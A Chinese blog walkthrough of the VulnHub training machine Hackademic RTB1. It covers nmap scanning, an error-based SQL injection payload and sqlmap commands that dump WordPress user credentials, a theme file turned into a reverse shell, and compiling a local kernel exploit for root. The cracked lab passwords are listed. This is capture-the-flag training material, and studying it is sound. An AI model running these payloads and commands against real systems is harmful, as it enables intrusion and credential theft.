Hackademic.RTB1 靶机渗透测试流程

已于 2023-07-18 17:05:22 修改
阅读量319 收藏 1
点赞数
文章标签: 网络 web安全 安全 linux
于 2023-07-17 22:28:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RemedyVI/article/details/131776222
版权

靶机下载地址

Hackademic: RTB1 ~ VulnHub

信息收集

主机探测

sudo nmap -sn 10.10.10.0/24

获取靶机IP地址10.10.10.10

初步扫描

sudo nmap -sT --min-rate 10000 -p- 10.10.10.10

可知80端口开放

80/tcp open   http

详细信息扫描 

 sudo nmap -sT -sC -sV -O -p 22,80 10.10.10.10

可知80端口版本信息

80/tcp open   http    Apache httpd 2.2.15 ((Fedora))

漏洞脚本扫描 

sudo nmap -sT --script=vuln -p 22,80 10.10.10.10  

都是DOS攻击,优先级靠后

UDP扫描 

sudo nmap -sU --top-ports 100 10.10.10.10

无有效信息

WEB指纹识别 

访问80端口,看源代码发现使用了wordpress CMS 版本号1.5.1.1

漏洞发现 

SQL注入

在URL输入引号,发现报错,有报错信息,存在SQL注入点,可尝试报错注入。

http://10.10.10.10/Hackademic_RTB1/?cat=1%27

构造payload 

http://10.10.10.10/Hackademic_RTB1/?cat=1||extractvalue(1,concat(0x7e,version()))#

成功获取数据库版本号

漏洞利用 

数据库爆破

使用SQLMAP爆破数据库

sudo sqlmap -u "10.10.10.10/Hackademic_RTB1/?cat=1" --level 5 --risk 3 --dbs --batch

sudo sqlmap -u "10.10.10.10/Hackademic_RTB1/?cat=1" --level 5 --risk 3 -D wordpress -T wp_users --dump

成功获得以下用户名和密码(已经破解过了)

 NickJames     admin

 JohnSmith     PUPPIES

 GeorgeMiller  q1w2e3

 TonyBlack     napoleon

 JasonKonnors  maxwell

 MaxBucky      kernel

 

后台登陆

目录扫描得到wordpress登录页面

使用GeorgeMiller  q1w2e3登录后台(其它用户也可以登录,但是没有主题和插件管理)

 反弹shell

 修改一个php文件为反弹shell,攻击机开启监听。

 访问得到反弹shell

 权限提升

查看系统版本号比较老,可使用系统漏洞提权.

PS:虽然能得到mysql的root账户密码并且secure_file_priv为空并且存在plugin目录,但是mysql不是root身份运行无法UDF提权。无sudo权限,无SUID,无计划任务,暂时没发现其它提权漏洞可利用。

查看当前Linux版本存在的提权漏洞,使用15285.c 

searchsploit Linux 2.6.3 |grep 'Escalation'

 

传文件编译运行,成功获取root权限

文件放在/tmp目录下

gcc -m32 15285.c -o shit

chmod 777 shit

./shit 

总结

信息收集知道使用了wordpressCMS,通过SQL注入得到后台登录的users表,登录后台通过主题文件修改得到反弹shell,最后利用系统漏洞提权,总体来说靶机难度很简单。

Teardrop、
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[靶机渗透笔记] HACKADEMIC: RTB1
H4ppyD0g的博客
01-23 2191
靶机链接https://www.vulnhub.com/entry/hackademic-rtb1,17/ 确定靶机 扫描存活主机 sudo nmap -sP 192.168.200.129/24 扫描具体信息 sudo nmap 192.168.200.129/24 192.168.200.134开启22和80端口,为靶机的ip地址。 前期扫描 nmap扫描靶机开启的两个端口的版本信息 sudo nmap -p 22,80 -sV 192.168.200.134 针对80端口 nmap默认脚本扫
hackademic.RTB1(利用php_reverse_shell)
JyajT的博客
04-23 304
针对vulhub的练习
oscp——Hackademic: RTB1
王嘟嘟的博客
02-22 571
0x00 前言 这是第33台机子啦 0x01 信息收集 0x02 Web80——webshell 访问一下网站,发现一个说明,这个时候一般都是要扫一下目录。 这里找到了一个特别的url,这里测试了一下sql注入 http://192.168.25.207/Hackademic_RTB1/?cat=1 拿到了一些账号密码,使用GeorgeMiller q1w2e3 进行登录 写一个反弹s...
Vulnhub靶机系列:Hackademic: RTB1
汗的博客
03-30 2167
https://www.hackingarticles.in/hack-the-hackademic-rtb1-vm-boot-to-root/ 文章目录靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/hackademic-rtb1,17/ 靶机设置 利用知识及工具 信息收集并getshell 提权 总结 ...
HackademicRTB1靶机练习
IWANnaaa的博客
11-14 405
HackademicRTB1靶机练习
MATLAB RTB(RoboticsToolbox for MATLAB)9.10安装包
09-12
用于MTALAB仿真学习机器人
matlab 机器人工具箱 m类型 RTB.mltbx
05-01
matlab 机器人工具箱 适合于毕业设计、自学、科研等 在MATLAB的环境下,使用RoboticsToolbox工具箱建立该机器人的数学模型,并对其进行运动学仿真及轨迹规划。 在官网下载的 绝对好用 安装路径 只需要在matlab ...
RVC 1st edition_RTB9 MVTB3 (2011).zip
04-10
MATLAB机器人及机器视觉组合工具箱_2011年第一版[petercorke.com]; 官网[https://petercorke.com/toolboxes/robotics-toolbox/]搬运来的,仅分享学习使用,如有侵权,立即删除。
OpenRTB2.5的中文翻译文档
01-13
OpenRTB2.5的中文翻译文档,适合对照英文文档
iwanvi-adx RTB协议规范1
08-04
2. DSP或者第三方广告平台向Adx返回出价结果及广告代码 1. ADX 的 RTB API参考通用OpenRTB规范:iab techlab openrtb
【Vulnhub靶机】Hackadmeic.RTB1
过期的秋刀鱼
08-19 465
(此系列共2台)难度:初级。
Hackademic.RTB1靶场
m0_72012500的博客
11-01 74
输入:sqlmap -u 'http://192.168.76.223/Hackademic_RTB1/?输入:sqlmap -u 'http://192.168.76.223/Hackademic_RTB1/?
CTF之Hackademic RTB1 靶机渗透(Wordpress1.5 SQL注入)
afei001
08-22 582
练习环境     攻击机:kali     靶机Hackademic: RTB1     下载地址:https://download.vulnhub.com/hackademic/Hackademic.RTB1.zip      1.发现靶机,端口扫描 root@kali:~# netdiscover -r 100.100.100.0/16 _____________________________________________________________________________ .
Hackadmeic.RTB1靶场
chongya927的博客
07-19 105
只需要把“cat=1”改为不存在的值,前面查不出来就会查询后面的。这样虽然修改成功,但不知道hello.php的路径在哪,从头再看看,发现扫描出的目录没仔细看,只看了一个后台登录界面。User_pass中的密码,经过sqlmap自带字典解密出了5个,还有一个没解出来,用md5查出来密码为PUPPIES。脚本执行成功,这里切换用户需要交互式shell,使用python获得交互式shell后切换到脏牛用户,提权成功。,开始是直接扫了IP,现在多了一个目录/Hackademic_RTB1/,那么直接扫该目录。
HACKADMIC-RTB1靶场(打靶流程)
qq_53733257的博客
10-29 343
HACKADMIC-RTB1靶场(打靶流程)
Hackademic.RTB1靶机渗透笔记
m0_72212352的博客
10-31 248
4.点击该连接,进入以下页面,提示目标为根目录的Key.txt,同时出现两个连接,分别访问。发现只有登录GeorgeMiller账号出现文件上传点,设置允许上传文件。查看id,已经提升到root权限,在根目录找到key.txt文件并查看。使用sqlmap进行扫描,出现结果,以此为突破点进行深入扫描。7.知道了可以登录的用户名和密码,要找到可以进行登录的地方。kali接收到反弹shell,并查看系统版本。3.出现web服务,进行访问,存在跳转连接。使用sql进行扫描,结果显示不存在。
Hackademic.RTB1渗透打靶流程
qq_65580890的博客
10-31 78
nmap -p1-65535 -sV 192.168.142.173(端口和服务)在web服务器上访问这两个端口:80端口。有Hackademic.RTB1渗透。Url中有后面,看看是否是sql注入。
Hackademic.RTB1-渗透报告
weixin_73942557的博客
10-30 127
找出服务器存在的安全隐患,和服务器管理员的相关人员的不安全行为,因此本次渗透流程采用黑盒测试。建议将网站的后台界面做有效的安全性处理,对用户的访问权限做有效的限制,对接受的参数做有效的安全性校验和过滤。这个靶机主要是利用泄露的敏感目录,然后访问到后台页面,通过注入漏洞拿到后台管理员的密码,从而造成服务器权限的丢失。找出目标服务器存在的脆弱性、威胁面、影响范围等多维度的安全问题,为服务器和网站的后续加固提供思路。减低敏感目录权限,对url接受的参数加上有效的校验和过滤,固定文件上传的类型。
rtb10.4.mltbx下载
最新发布
11-16
rtb10.4.mltbx是一个MATLAB工具箱文件,用于在MATLAB软件中进行实时竞价广告买卖(RTB)相关的数据处理和分析。要下载这个工具箱文件,您可以按照以下步骤操作: 首先,您需要通过互联网连接到MATLAB官方网站或者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值